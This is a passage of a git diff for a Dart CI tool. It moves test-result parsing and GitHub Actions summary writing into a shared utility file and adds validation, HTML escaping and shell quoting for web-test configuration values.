@@ -53,7 +54,7 @@ class TestCommand extends Command { final testDir = Directory('$repoRoot/test'); if (!testDir.existsSync()) { Logger.success('No test/ directory found — skipping root tests'); - _writeStepSummary('## Test Results\n\n**No test/ directory found — skipped.**\n'); + _writeTestStepSummary('## Test Results\n\n**No test/ directory found — skipped.**\n'); } else { // Build test arguments with two file reporters + expanded console output final testArgs = [ @@ -112,10 +113,10 @@ class TestCommand extends Command { } // Parse the JSON results file for structured test data - final results = _parseTestResultsJson(jsonPath); + final results = parseTestResultsJson(jsonPath); // Generate and write the rich job summary - _writeTestJobSummary(results, exitCode, logDir); + writeTestJobSummary(results, exitCode, logDir); if (exitCode != 0) { Logger.error('Root tests failed with exit code $exitCode'); @@ -203,286 +204,11 @@ class TestCommand extends Command { } } -// ── NDJSON Parsing ──────────────────────────────────────────────────────────── - -/// A single test failure with its error, stack trace, and captured print output. -class _TestFailure { - final String name; - final String error; - final String stackTrace; - final String printOutput; - final int durationMs; - - _TestFailure({ - required this.name, - required this.error, - required this.stackTrace, - required this.printOutput, - required this.durationMs, - }); -} - -/// Parsed results from the NDJSON test results file. -class _TestResults { - int passed = 0; - int failed = 0; - int skipped = 0; - int totalDurationMs = 0; - final List<_TestFailure> failures = []; - bool parsed = false; -} - -/// Parse the NDJSON file produced by `--file-reporter json:`. -/// -/// Each line is a JSON object with a `type` field. 
We track: -/// - `testStart`: register test name + start time -/// - `testDone`: record result, compute duration -/// - `error`: capture error message + stack trace (accumulated per test) -/// - `print`: capture print output, attribute to testID -/// - `done`: overall total time -_TestResults _parseTestResultsJson(String jsonPath) { - final results = _TestResults(); - final file = File(jsonPath); - if (!file.existsSync()) { - Logger.warn('No JSON results file found at $jsonPath'); - return results; - } - - results.parsed = true; - - // Tracking maps keyed by testID - final testNames = {}; - final testStartTimes = {}; - final testErrors = {}; - final testStackTraces = {}; - final testPrints = {}; - - final lines = file.readAsLinesSync(); - for (final line in lines) { - if (line.trim().isEmpty) continue; - try { - final event = jsonDecode(line) as Map; - final type = event['type'] as String?; - - switch (type) { - case 'testStart': - final test = event['test'] as Map?; - if (test == null) break; - final id = test['id'] as int?; - if (id == null) break; - testNames[id] = test['name'] as String? ?? 'unknown'; - testStartTimes[id] = event['time'] as int? ?? 0; - - case 'testDone': - final id = event['testID'] as int?; - if (id == null) break; - final resultStr = event['result'] as String?; - final hidden = event['hidden'] as bool? ?? false; - final skipped = event['skipped'] as bool? ?? false; - - // Skip synthetic/hidden entries (group-level loading events) - if (hidden) break; - - if (skipped) { - results.skipped++; - } else if (resultStr == 'success') { - results.passed++; - } else if (resultStr == 'failure' || resultStr == 'error') { - results.failed++; - final startTime = testStartTimes[id] ?? 0; - final endTime = event['time'] as int? ?? 0; - results.failures.add( - _TestFailure( - name: testNames[id] ?? 'unknown', - error: testErrors[id]?.toString() ?? '', - stackTrace: testStackTraces[id]?.toString() ?? '', - printOutput: testPrints[id]?.toString() ?? 
'', - durationMs: endTime - startTime, - ), - ); - } - - case 'error': - final id = event['testID'] as int?; - if (id == null) break; - // Accumulate multiple errors per test (e.g. test failure + tearDown exception) - testErrors.putIfAbsent(id, () => StringBuffer()); - if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); - testErrors[id]!.write(event['error'] as String? ?? ''); - testStackTraces.putIfAbsent(id, () => StringBuffer()); - if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); - testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); - - case 'print': - final id = event['testID'] as int?; - if (id == null) break; - final message = event['message'] as String? ?? ''; - testPrints.putIfAbsent(id, () => StringBuffer()); - testPrints[id]!.writeln(message); - - case 'done': - final time = event['time'] as int? ?? 0; - results.totalDurationMs = time; - } - } catch (e) { - // Skip malformed JSON lines but continue parsing the rest - Logger.warn('Skipping malformed JSON line: $e'); - } - } - - return results; -} - -// ── Job Summary ─────────────────────────────────────────────────────────────── - -/// Generate a rich GitHub Actions job summary from parsed test results. -void _writeTestJobSummary(_TestResults results, int exitCode, String logDir) { - final buf = StringBuffer(); - - // Determine platform identifier for the heading - final platformId = - Platform.environment['PLATFORM_ID'] ?? Platform.environment['RUNNER_NAME'] ?? Platform.operatingSystem; - - buf.writeln('## Test Results — $platformId'); - buf.writeln(); - - if (!results.parsed) { - // Fallback: no JSON file was produced (test binary crashed before writing) - final status = exitCode == 0 ? 'passed' : 'failed'; - final icon = exitCode == 0 ? 
'NOTE' : 'CAUTION'; - buf.writeln('> [!$icon]'); - buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.'); - buf.writeln(); - buf.writeln('Check the expanded output in test logs for details.'); - buf.writeln(); - buf.writeln(_artifactLink(':package: View full test logs')); - _writeStepSummary(buf.toString()); - return; - } - - final total = results.passed + results.failed + results.skipped; - final durationSec = (results.totalDurationMs / 1000).toStringAsFixed(1); - - // Status banner — alert box lines must all be prefixed with > - if (results.failed == 0) { - buf.writeln('> [!NOTE]'); - buf.writeln('> All $total tests passed in ${durationSec}s'); - } else { - buf.writeln('> [!CAUTION]'); - buf.writeln('> ${results.failed} of $total tests failed'); - } - buf.writeln(); - - // Summary table - buf.writeln('| Status | Count |'); - buf.writeln('|--------|------:|'); - buf.writeln('| :white_check_mark: Passed | ${results.passed} |'); - buf.writeln('| :x: Failed | ${results.failed} |'); - buf.writeln('| :fast_forward: Skipped | ${results.skipped} |'); - buf.writeln('| **Total** | **$total** |'); - buf.writeln('| **Duration** | **${durationSec}s** |'); - buf.writeln(); - - // Failed test details - if (results.failures.isNotEmpty) { - buf.writeln('### Failed Tests'); - buf.writeln(); - - // Cap at 20 failures to avoid exceeding the 1 MiB summary limit - final displayFailures = results.failures.take(20).toList(); - for (final f in displayFailures) { - final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; - buf.writeln('
'); - buf.writeln(':x: ${_escapeHtml(f.name)}$durStr'); - buf.writeln(); - - if (f.error.isNotEmpty) { - // Truncate very long error messages - final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; - buf.writeln('**Error:**'); - final fence = _codeFence(error); - buf.writeln(fence); - buf.writeln(error); - buf.writeln(fence); - buf.writeln(); - } - - if (f.stackTrace.isNotEmpty) { - // Truncate very long stack traces - final stack = f.stackTrace.length > 1500 ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' : f.stackTrace; - buf.writeln('**Stack Trace:**'); - final fence = _codeFence(stack); - buf.writeln(fence); - buf.writeln(stack); - buf.writeln(fence); - buf.writeln(); - } - - if (f.printOutput.isNotEmpty) { - final trimmed = f.printOutput.trimRight(); - final lineCount = trimmed.split('\n').length; - // Truncate captured output if it's very long - final printPreview = trimmed.length > 1500 ? '${trimmed.substring(0, 1500)}\n... (truncated)' : trimmed; - buf.writeln('**Captured Output ($lineCount lines):**'); - final fence = _codeFence(printPreview); - buf.writeln(fence); - buf.writeln(printPreview); - buf.writeln(fence); - buf.writeln(); - } - - buf.writeln('
');
-      buf.writeln();
-    }
-
-    if (results.failures.length > 20) {
-      buf.writeln(
-        '_...and ${results.failures.length - 20} more failures. '
-        'See test logs artifact for full details._',
-      );
-      buf.writeln();
-    }
-  }
-
-  // Artifact link
-  buf.writeln('---');
-  buf.writeln(_artifactLink(':package: View full test logs'));
-  buf.writeln();
-
-  _writeStepSummary(buf.toString());
-}
-
-// ── Helpers ─────────────────────────────────────────────────────────────────
-
 /// Write a markdown summary to $GITHUB_STEP_SUMMARY (visible in Actions UI).
 /// No-op when running locally (env var not set).
-void _writeStepSummary(String markdown) {
+void _writeTestStepSummary(String markdown) {
   final summaryFile = Platform.environment['GITHUB_STEP_SUMMARY'];
   if (summaryFile != null) {
     File(summaryFile).writeAsStringSync(markdown, mode: FileMode.append);
   }
 }
-
-/// Build a link to the current workflow run's artifacts page.
-String _artifactLink([String label = 'View all artifacts']) {
-  final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com';
-  final repo = Platform.environment['GITHUB_REPOSITORY'];
-  final runId = Platform.environment['GITHUB_RUN_ID'];
-  if (repo == null || runId == null) return '';
-  return '[$label]($server/$repo/actions/runs/$runId)';
-}
-
-/// Escape HTML special characters for safe embedding in GitHub markdown.
-String _escapeHtml(String input) {
-  return input.replaceAll('&', '&amp;').replaceAll('<', '&lt;').replaceAll('>', '&gt;').replaceAll('"', '&quot;');
-}
-
-/// Choose a code fence delimiter that does not appear in [content].
-/// Starts with triple backticks and extends as needed.
-String _codeFence(String content) { - var fence = '```'; - while (content.contains(fence)) { - fence += '`'; - } - return fence; -} diff --git a/lib/src/cli/manage_cicd.dart b/lib/src/cli/manage_cicd.dart index 37a63b6..5f42793 100644 --- a/lib/src/cli/manage_cicd.dart +++ b/lib/src/cli/manage_cicd.dart @@ -6,6 +6,7 @@ import 'dart:io'; import '../triage/utils/run_context.dart'; import '../triage/utils/config.dart'; import 'options/manage_cicd_options.dart'; +import 'utils/test_results_util.dart'; // Re-export path constants from run_context for use throughout this file. // All CI artifacts live under .runtime_ci/ at the repo root: @@ -2221,7 +2222,7 @@ Future _runTest(String repoRoot) async { } // Parse the JSON results file for structured test data - final results = _parseTestResultsJson(jsonPath); + final results = parseTestResultsJson(jsonPath); // Write console output to log file as well (supplements shell-level tee) File('$logDir/dart_stdout.log').writeAsStringSync(stdoutBuf.toString()); @@ -2230,7 +2231,7 @@ Future _runTest(String repoRoot) async { } // Generate and write the rich job summary - _writeTestJobSummary(results, exitCode, logDir); + writeTestJobSummary(results, exitCode, logDir); if (exitCode != 0) { _error('Tests failed (exit code $exitCode)'); @@ -2239,266 +2240,6 @@ Future _runTest(String repoRoot) async { _success('All tests passed'); } -/// A single test failure with its error, stack trace, and captured print output. -class _TestFailure { - final String name; - final String error; - final String stackTrace; - final String printOutput; - final int durationMs; - - _TestFailure({ - required this.name, - required this.error, - required this.stackTrace, - required this.printOutput, - required this.durationMs, - }); -} - -/// Parsed results from the NDJSON test results file. 
-class _TestResults { - int passed = 0; - int failed = 0; - int skipped = 0; - int totalDurationMs = 0; - final List<_TestFailure> failures = []; - bool parsed = false; -} - -/// Parse the NDJSON file produced by `--file-reporter json:`. -/// -/// Each line is a JSON object with a `type` field. We track: -/// - `testStart`: register test name, start time, skip status -/// - `testDone`: record result, compute duration -/// - `error`: capture error message + stack trace -/// - `print`: capture print output, attribute to testID -/// - `done`: overall success/failure + total time -_TestResults _parseTestResultsJson(String jsonPath) { - final results = _TestResults(); - final file = File(jsonPath); - if (!file.existsSync()) { - _warn('No JSON results file found at $jsonPath'); - return results; - } - - results.parsed = true; - - // Tracking maps keyed by testID - final testNames = {}; - final testStartTimes = {}; - final testErrors = {}; - final testStackTraces = {}; - final testPrints = {}; - - final lines = file.readAsLinesSync(); - for (final line in lines) { - if (line.trim().isEmpty) continue; - try { - final event = jsonDecode(line) as Map; - final type = event['type'] as String?; - - switch (type) { - case 'testStart': - final test = event['test'] as Map?; - if (test == null) break; - final id = test['id'] as int?; - if (id == null) break; - testNames[id] = test['name'] as String? ?? 'unknown'; - testStartTimes[id] = event['time'] as int? ?? 0; - - case 'testDone': - final id = event['testID'] as int?; - if (id == null) break; - final resultStr = event['result'] as String?; - final hidden = event['hidden'] as bool? ?? false; - final skipped = event['skipped'] as bool? ?? 
false; - - // Skip synthetic/hidden entries (group-level loading events) - if (hidden) break; - - if (skipped) { - results.skipped++; - } else if (resultStr == 'success') { - results.passed++; - } else if (resultStr == 'failure' || resultStr == 'error') { - results.failed++; - final startTime = testStartTimes[id] ?? 0; - final endTime = event['time'] as int? ?? 0; - results.failures.add( - _TestFailure( - name: testNames[id] ?? 'unknown', - error: testErrors[id]?.toString() ?? '', - stackTrace: testStackTraces[id]?.toString() ?? '', - printOutput: testPrints[id]?.toString() ?? '', - durationMs: endTime - startTime, - ), - ); - } - - case 'error': - final id = event['testID'] as int?; - if (id == null) break; - // Accumulate multiple errors per test (e.g. test failure + tearDown exception) - testErrors.putIfAbsent(id, () => StringBuffer()); - if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); - testErrors[id]!.write(event['error'] as String? ?? ''); - testStackTraces.putIfAbsent(id, () => StringBuffer()); - if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); - testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); - - case 'print': - final id = event['testID'] as int?; - if (id == null) break; - final message = event['message'] as String? ?? ''; - testPrints.putIfAbsent(id, () => StringBuffer()); - testPrints[id]!.writeln(message); - - case 'done': - final time = event['time'] as int? ?? 0; - results.totalDurationMs = time; - } - } catch (e) { - // Skip malformed JSON lines but continue parsing the rest - _warn('Skipping malformed JSON line: $e'); - } - } - - return results; -} - -/// Generate a rich GitHub Actions job summary from parsed test results. -void _writeTestJobSummary(_TestResults results, int exitCode, String logDir) { - final buf = StringBuffer(); - - // Determine platform identifier for the heading - final platformId = - Platform.environment['PLATFORM_ID'] ?? Platform.environment['RUNNER_NAME'] ?? 
Platform.operatingSystem; - - buf.writeln('## Test Results — $platformId'); - buf.writeln(); - - if (!results.parsed) { - // Fallback: no JSON file was produced (test binary crashed before writing) - final status = exitCode == 0 ? 'passed' : 'failed'; - final icon = exitCode == 0 ? 'NOTE' : 'CAUTION'; - buf.writeln('> [!$icon]'); - buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.'); - buf.writeln(); - buf.writeln('Check the expanded output in test logs for details.'); - buf.writeln(); - buf.writeln(_artifactLink(':package: View full test logs')); - _writeStepSummary(buf.toString()); - return; - } - - final total = results.passed + results.failed + results.skipped; - final durationSec = (results.totalDurationMs / 1000).toStringAsFixed(1); - - // Status banner — alert box lines must all be prefixed with > - if (results.failed == 0) { - buf.writeln('> [!NOTE]'); - buf.writeln('> All $total tests passed in ${durationSec}s'); - } else { - buf.writeln('> [!CAUTION]'); - buf.writeln('> ${results.failed} of $total tests failed'); - } - buf.writeln(); - - // Summary table - buf.writeln('| Status | Count |'); - buf.writeln('|--------|------:|'); - buf.writeln('| :white_check_mark: Passed | ${results.passed} |'); - buf.writeln('| :x: Failed | ${results.failed} |'); - buf.writeln('| :fast_forward: Skipped | ${results.skipped} |'); - buf.writeln('| **Total** | **$total** |'); - buf.writeln('| **Duration** | **${durationSec}s** |'); - buf.writeln(); - - // Failed test details - if (results.failures.isNotEmpty) { - buf.writeln('### Failed Tests'); - buf.writeln(); - - // Cap at 20 failures to avoid exceeding the 1 MiB summary limit - final displayFailures = results.failures.take(20).toList(); - for (final f in displayFailures) { - final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; - buf.writeln('
'); - buf.writeln(':x: ${_escapeHtml(f.name)}$durStr'); - buf.writeln(); - - if (f.error.isNotEmpty) { - // Truncate very long error messages - final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; - buf.writeln('**Error:**'); - final errorFence = _codeFence(error); - buf.writeln(errorFence); - buf.writeln(error); - buf.writeln(errorFence); - buf.writeln(); - } - - if (f.stackTrace.isNotEmpty) { - // Truncate very long stack traces - final stack = f.stackTrace.length > 1500 ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' : f.stackTrace; - buf.writeln('**Stack Trace:**'); - final stackFence = _codeFence(stack); - buf.writeln(stackFence); - buf.writeln(stack); - buf.writeln(stackFence); - buf.writeln(); - } - - if (f.printOutput.isNotEmpty) { - final trimmed = f.printOutput.trimRight(); - final lineCount = trimmed.split('\n').length; - // Truncate captured output if it's very long - final printPreview = trimmed.length > 1500 ? '${trimmed.substring(0, 1500)}\n... (truncated)' : trimmed; - buf.writeln('**Captured Output ($lineCount lines):**'); - final printFence = _codeFence(printPreview); - buf.writeln(printFence); - buf.writeln(printPreview); - buf.writeln(printFence); - buf.writeln(); - } - - buf.writeln('
');
-      buf.writeln();
-    }
-
-    if (results.failures.length > 20) {
-      buf.writeln(
-        '_...and ${results.failures.length - 20} more failures. '
-        'See test logs artifact for full details._',
-      );
-      buf.writeln();
-    }
-  }
-
-  // Artifact link
-  buf.writeln('---');
-  buf.writeln(_artifactLink(':package: View full test logs'));
-  buf.writeln();
-
-  _writeStepSummary(buf.toString());
-}
-
-/// Escape HTML special characters for safe embedding in GitHub markdown.
-String _escapeHtml(String input) {
-  return input.replaceAll('&', '&amp;').replaceAll('<', '&lt;').replaceAll('>', '&gt;').replaceAll('"', '&quot;');
-}
-
-/// Choose a code fence delimiter that does not appear in [content].
-/// Starts with triple backticks and extends as needed.
-String _codeFence(String content) {
-  var fence = '```';
-  while (content.contains(fence)) {
-    fence += '`';
-  }
-  return fence;
-}
-
 /// Run dart analyze and fail only on actual errors.
 ///
 /// We run plain `dart analyze` (no --fatal-infos) and parse output ourselves.
diff --git a/lib/src/cli/utils/step_summary.dart b/lib/src/cli/utils/step_summary.dart
index a0975c0..20f3568 100644
--- a/lib/src/cli/utils/step_summary.dart
+++ b/lib/src/cli/utils/step_summary.dart
@@ -51,4 +51,9 @@
     final openAttr = open ? ' open' : '';
     return '<details$openAttr>\n\n<summary>$title</summary>\n\n$content\n\n</details>\n';
   }
+
+  /// Escape HTML special characters for safe embedding in GitHub markdown.
+  static String escapeHtml(String input) {
+    return input.replaceAll('&', '&amp;').replaceAll('<', '&lt;').replaceAll('>', '&gt;').replaceAll('"', '&quot;');
+  }
 }
diff --git a/lib/src/cli/utils/test_results_util.dart b/lib/src/cli/utils/test_results_util.dart
new file mode 100644
index 0000000..5259e0b
--- /dev/null
+++ b/lib/src/cli/utils/test_results_util.dart
@@ -0,0 +1,262 @@
+import 'dart:convert';
+import 'dart:io';
+
+import 'logger.dart';
+import 'step_summary.dart';
+
+/// A single test failure with its error, stack trace, and captured print output.
+class TestFailure {
+  final String name;
+  final String error;
+  final String stackTrace;
+  final String printOutput;
+  final int durationMs;
+
+  TestFailure({
+    required this.name,
+    required this.error,
+    required this.stackTrace,
+    required this.printOutput,
+    required this.durationMs,
+  });
+}
+
+/// Parsed results from the NDJSON test results file produced by `--file-reporter json:`.
+class TestResults {
+  int passed = 0;
+  int failed = 0;
+  int skipped = 0;
+  int totalDurationMs = 0;
+  final List<TestFailure> failures = [];
+  bool parsed = false;
+}
+
+/// Parse the NDJSON file produced by `--file-reporter json:`.
+///
+/// Each line is a JSON object with a `type` field. We track:
+/// - `testStart`: register test name + start time
+/// - `testDone`: record result, compute duration
+/// - `error`: capture error message + stack trace (accumulated per test)
+/// - `print`: capture print output, attribute to testID
+/// - `done`: overall total time
+TestResults parseTestResultsJson(String jsonPath) {
+  final results = TestResults();
+  final file = File(jsonPath);
+  if (!file.existsSync()) {
+    Logger.warn('No JSON results file found at $jsonPath');
+    return results;
+  }
+
+  results.parsed = true;
+
+  // Tracking maps keyed by testID
+  final testNames = <int, String>{};
+  final testStartTimes = <int, int>{};
+  final testErrors = <int, StringBuffer>{};
+  final testStackTraces = <int, StringBuffer>{};
+  final testPrints = <int, StringBuffer>{};
+
+  final lines = file.readAsLinesSync();
+  for (final line in lines) {
+    if (line.trim().isEmpty) continue;
+    try {
+      final event = jsonDecode(line) as Map;
+      final type = event['type'] as String?;
+
+      switch (type) {
+        case 'testStart':
+          final test = event['test'] as Map?;
+          if (test == null) break;
+          final id = test['id'] as int?;
+          if (id == null) break;
+          testNames[id] = test['name'] as String? ?? 'unknown';
+          testStartTimes[id] = event['time'] as int? ?? 
0; + + case 'testDone': + final id = event['testID'] as int?; + if (id == null) break; + final resultStr = event['result'] as String?; + final hidden = event['hidden'] as bool? ?? false; + final skipped = event['skipped'] as bool? ?? false; + + // Skip synthetic/hidden entries (group-level loading events) + if (hidden) break; + + if (skipped) { + results.skipped++; + } else if (resultStr == 'success') { + results.passed++; + } else if (resultStr == 'failure' || resultStr == 'error') { + results.failed++; + final startTime = testStartTimes[id] ?? 0; + final endTime = event['time'] as int? ?? 0; + results.failures.add( + TestFailure( + name: testNames[id] ?? 'unknown', + error: testErrors[id]?.toString() ?? '', + stackTrace: testStackTraces[id]?.toString() ?? '', + printOutput: testPrints[id]?.toString() ?? '', + durationMs: endTime - startTime, + ), + ); + } + + case 'error': + final id = event['testID'] as int?; + if (id == null) break; + // Accumulate multiple errors per test (e.g. test failure + tearDown exception) + testErrors.putIfAbsent(id, () => StringBuffer()); + if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); + testErrors[id]!.write(event['error'] as String? ?? ''); + testStackTraces.putIfAbsent(id, () => StringBuffer()); + if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); + testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); + + case 'print': + final id = event['testID'] as int?; + if (id == null) break; + final message = event['message'] as String? ?? ''; + testPrints.putIfAbsent(id, () => StringBuffer()); + testPrints[id]!.writeln(message); + + case 'done': + final time = event['time'] as int? ?? 0; + results.totalDurationMs = time; + } + } catch (e) { + // Skip malformed JSON lines but continue parsing the rest + Logger.warn('Skipping malformed JSON line: $e'); + } + } + + return results; +} + +/// Choose a code fence delimiter that does not appear in [content]. 
+String _codeFence(String content) { + var fence = '```'; + while (content.contains(fence)) { + fence += '`'; + } + return fence; +} + +/// Generate a rich GitHub Actions job summary from parsed test results. +/// +/// Writes to $GITHUB_STEP_SUMMARY when running in CI. Platform identifier +/// and failure names are HTML-escaped for safe embedding. +void writeTestJobSummary(TestResults results, int exitCode, String logDir) { + final buf = StringBuffer(); + + // Determine platform identifier for the heading (HTML-escaped for safe embedding) + final platformId = + Platform.environment['PLATFORM_ID'] ?? Platform.environment['RUNNER_NAME'] ?? Platform.operatingSystem; + + buf.writeln('## Test Results — ${StepSummary.escapeHtml(platformId)}'); + buf.writeln(); + + if (!results.parsed) { + // Fallback: no JSON file was produced (test binary crashed before writing) + final status = exitCode == 0 ? 'passed' : 'failed'; + final icon = exitCode == 0 ? 'NOTE' : 'CAUTION'; + buf.writeln('> [!$icon]'); + buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.'); + buf.writeln(); + buf.writeln('Check the expanded output in test logs for details.'); + buf.writeln(); + buf.writeln(StepSummary.artifactLink(':package: View full test logs')); + StepSummary.write(buf.toString()); + return; + } + + final total = results.passed + results.failed + results.skipped; + final durationSec = (results.totalDurationMs / 1000).toStringAsFixed(1); + + // Status banner — alert box lines must all be prefixed with > + if (results.failed == 0) { + buf.writeln('> [!NOTE]'); + buf.writeln('> All $total tests passed in ${durationSec}s'); + } else { + buf.writeln('> [!CAUTION]'); + buf.writeln('> ${results.failed} of $total tests failed'); + } + buf.writeln(); + + // Summary table + buf.writeln('| Status | Count |'); + buf.writeln('|--------|------:|'); + buf.writeln('| :white_check_mark: Passed | ${results.passed} |'); + buf.writeln('| :x: Failed | ${results.failed} |'); + 
buf.writeln('| :fast_forward: Skipped | ${results.skipped} |'); + buf.writeln('| **Total** | **$total** |'); + buf.writeln('| **Duration** | **${durationSec}s** |'); + buf.writeln(); + + // Failed test details + if (results.failures.isNotEmpty) { + buf.writeln('### Failed Tests'); + buf.writeln(); + + // Cap at 20 failures to avoid exceeding the 1 MiB summary limit + final displayFailures = results.failures.take(20).toList(); + for (final f in displayFailures) { + final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; + buf.writeln('
'); + buf.writeln(':x: ${StepSummary.escapeHtml(f.name)}$durStr'); + buf.writeln(); + + if (f.error.isNotEmpty) { + // Truncate very long error messages + final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; + buf.writeln('**Error:**'); + final fence = _codeFence(error); + buf.writeln(fence); + buf.writeln(error); + buf.writeln(fence); + buf.writeln(); + } + + if (f.stackTrace.isNotEmpty) { + // Truncate very long stack traces + final stack = f.stackTrace.length > 1500 ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' : f.stackTrace; + buf.writeln('**Stack Trace:**'); + final fence = _codeFence(stack); + buf.writeln(fence); + buf.writeln(stack); + buf.writeln(fence); + buf.writeln(); + } + + if (f.printOutput.isNotEmpty) { + final trimmed = f.printOutput.trimRight(); + final lineCount = trimmed.split('\n').length; + // Truncate captured output if it's very long + final printPreview = trimmed.length > 1500 ? '${trimmed.substring(0, 1500)}\n... (truncated)' : trimmed; + buf.writeln('**Captured Output ($lineCount lines):**'); + final fence = _codeFence(printPreview); + buf.writeln(fence); + buf.writeln(printPreview); + buf.writeln(fence); + buf.writeln(); + } + + buf.writeln('
'); + buf.writeln(); + } + + if (results.failures.length > 20) { + buf.writeln( + '_...and ${results.failures.length - 20} more failures. ' + 'See test logs artifact for full details._', + ); + buf.writeln(); + } + } + + // Artifact link + buf.writeln('---'); + buf.writeln(StepSummary.artifactLink(':package: View full test logs')); + buf.writeln(); + + StepSummary.write(buf.toString()); +} diff --git a/lib/src/cli/utils/workflow_generator.dart b/lib/src/cli/utils/workflow_generator.dart index a39def2..5b8396f 100644 --- a/lib/src/cli/utils/workflow_generator.dart +++ b/lib/src/cli/utils/workflow_generator.dart @@ -55,6 +55,8 @@ const Set _knownFeatureKeys = { 'web_test', }; +const Set _knownWebTestKeys = {'concurrency', 'paths'}; + /// Renders CI workflow YAML from a Mustache skeleton template and config.json. /// /// The skeleton uses `<% %>` delimiters (set via `{{=<% %>=}}` at the top) @@ -71,6 +73,12 @@ class WorkflowGenerator { WorkflowGenerator({required this.ciConfig, required this.toolingVersion}); + /// Returns the web_test config map if present and valid; otherwise null. + static Map? _getWebTestConfig(Map ciConfig) { + final raw = ciConfig['web_test']; + return raw is Map ? raw : null; + } + /// Load the CI config section from a repo's config.json. /// /// Returns null if the config.json doesn't exist or has no `ci` section. @@ -96,7 +104,15 @@ class WorkflowGenerator { /// Render the CI workflow from the skeleton template. /// /// If [existingContent] is provided, user sections are preserved from it. + /// + /// Throws [StateError] if the config is invalid. Always validates before + /// rendering to prevent interpolation of unsafe values into shell commands. String render({String? 
existingContent}) { + final errors = validate(ciConfig); + if (errors.isNotEmpty) { + throw StateError('Cannot render with invalid config:\n ${errors.join('\n ')}'); + } + final skeletonPath = TemplateResolver.resolveTemplatePath('github/workflows/ci.skeleton.yaml'); final skeletonFile = File(skeletonPath); if (!skeletonFile.existsSync()) { @@ -180,10 +196,10 @@ class WorkflowGenerator { 'build_runner': features['build_runner'] == true, 'web_test': features['web_test'] == true, - // Web test config (only meaningful when web_test is true) - 'web_test_concurrency': _resolveWebTestConcurrency(ciConfig), - 'web_test_paths': _resolveWebTestPaths(ciConfig), - 'web_test_has_paths': _resolveWebTestHasPaths(ciConfig), + // Web test config (only computed when web_test is true) + 'web_test_concurrency': features['web_test'] == true ? _resolveWebTestConcurrency(ciConfig) : '1', + 'web_test_paths': features['web_test'] == true ? _resolveWebTestPaths(ciConfig) : '', + 'web_test_has_paths': features['web_test'] == true && _resolveWebTestHasPaths(ciConfig), // Secrets / env 'has_secrets': secretsList.isNotEmpty, @@ -205,36 +221,38 @@ class WorkflowGenerator { } static String _resolveWebTestConcurrency(Map ciConfig) { - final webTestConfig = ciConfig['web_test']; - if (webTestConfig is Map) { + final webTestConfig = _getWebTestConfig(ciConfig); + if (webTestConfig != null) { final concurrency = webTestConfig['concurrency']; - if (concurrency is int && concurrency > 0) { + if (concurrency is int && concurrency > 0 && concurrency <= 32) { return '$concurrency'; } } return '1'; } - static String _resolveWebTestPaths(Map ciConfig) { - final webTestConfig = ciConfig['web_test']; - if (webTestConfig is Map) { + /// Shared filter: extracts valid, normalized web test paths from config. 
+ static List _filteredWebTestPaths(Map ciConfig) { + final webTestConfig = _getWebTestConfig(ciConfig); + if (webTestConfig != null) { final paths = webTestConfig['paths']; if (paths is List && paths.isNotEmpty) { - return paths.whereType().where((s) => s.trim().isNotEmpty).join(' '); + return paths.whereType().where((s) => s.trim().isNotEmpty).map((s) => p.posix.normalize(s)).toList(); } } - return ''; + return const []; + } + + static String _resolveWebTestPaths(Map ciConfig) { + final filtered = _filteredWebTestPaths(ciConfig); + if (filtered.isEmpty) return ''; + // Shell-quote each path for defense-in-depth (validation already blocks + // dangerous characters, but quoting prevents breakage from future changes). + return filtered.map((s) => "'$s'").join(' '); } static bool _resolveWebTestHasPaths(Map ciConfig) { - final webTestConfig = ciConfig['web_test']; - if (webTestConfig is Map) { - final paths = webTestConfig['paths']; - if (paths is List && paths.isNotEmpty) { - return paths.whereType().where((s) => s.trim().isNotEmpty).isNotEmpty; - } - } - return false; + return _filteredWebTestPaths(ciConfig).isNotEmpty; } /// Extract user sections from the existing file and re-insert them @@ -437,12 +455,19 @@ class WorkflowGenerator { if (webTestConfig is! Map) { errors.add('ci.web_test must be an object, got ${webTestConfig.runtimeType}'); } else { + // Detect unknown keys inside web_test config + for (final key in webTestConfig.keys) { + if (key is String && !_knownWebTestKeys.contains(key)) { + errors.add('ci.web_test contains unknown key "$key" (typo?)'); + } + } + final concurrency = webTestConfig['concurrency']; if (concurrency != null) { if (concurrency is! 
